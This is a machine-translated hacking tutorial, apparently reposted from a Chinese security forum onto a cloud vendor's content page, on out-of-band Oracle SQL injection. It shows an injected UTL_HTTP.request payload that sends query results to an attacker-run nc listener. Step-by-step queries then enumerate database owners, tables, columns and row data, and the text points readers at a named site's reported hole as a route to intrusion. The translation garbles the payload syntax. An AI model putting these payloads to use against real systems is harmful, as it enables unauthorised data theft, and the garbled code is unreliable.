Oracle injection technology-Oracle + nc Injection

Source: Internet
Author: User

Author: Kindle
MSN: Kindle@live.cn
Blog: http://hi.baidu.com/system_exp
Team: Security Team (http://bbs.exploits.com.cn)

First, the Internet nc listens to the corresponding port

The url statement is as follows:

Http://www.exploits.com.cn/Kindle? Jsp = 1 and UTL_HTTP.request (Internet ip: port/| (SQL statement) = 1 --

The content is as follows:

And UTL_HTTP.request (Internet ip: port/| (SQL statement) = 1 --
Database explosion:

Select owner from all_tables where rownum = 1

Select owner from all_tables where owner <> first database name and rownum = 1

Select owner from all_tables where owner <> first database name and owner <> second and rownum = 1

Select owner from all_tables where owner <> first database name and rownum = 1


On this basis

Burst table:

Select TABLE_NAME from all_tables where owner = Database Name and rownum = 1

Select TABLE_NAME from all_tables where owner = Database Name and rownum = 1 and TABLE_NAME <> table name 1

Select TABLE_NAME from all_tables where owner = Database Name and rownum = 1 and TABLE_NAME <> table name 1 and TABLE_NAME <> table name 2

On this basis

Burst columns:

Select COLUMN_NAME from user_tab_columns where table_name = table name and rownum = 1

Select COLUMN_NAME from user_tab_columns where table_name = table name and rownum = 1 and COLUMN_NAME <> first column name popped up

Select COLUMN_NAME from user_tab_columns where table_name = table name and rownum = 1 and COLUMN_NAME <> first column name and COLUMN_NAME <> second column name

Burst content:

First content: select column name from table name where rownum = 1

Second content: select column name from table name where rownum = 1 and column name <> first value

Third content: select column name from table name where rownum = 1 and column name <> first value and column name <> second value

On this basis

Now we turn around to look at the "hichina embarrassing-web ORACLE injection vulnerability exposure" http://bbs.exploits.com.cn/read.php? Tid-144.html

Is it clear that... o (∩ _ ∩) o... haha

Note:
1: In windows, oracle is started as a service, so that the system permission can be directly obtained through web injection (this part of content is being sorted and tested, to provide more intuitive, concise, and effective reference materials
2: Oracle will also be analyzed for unix and linux operating systems. I believe Oracle injection will become a bridge for advanced Hack intrusion.
3. This is a series of articles to be updated later

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.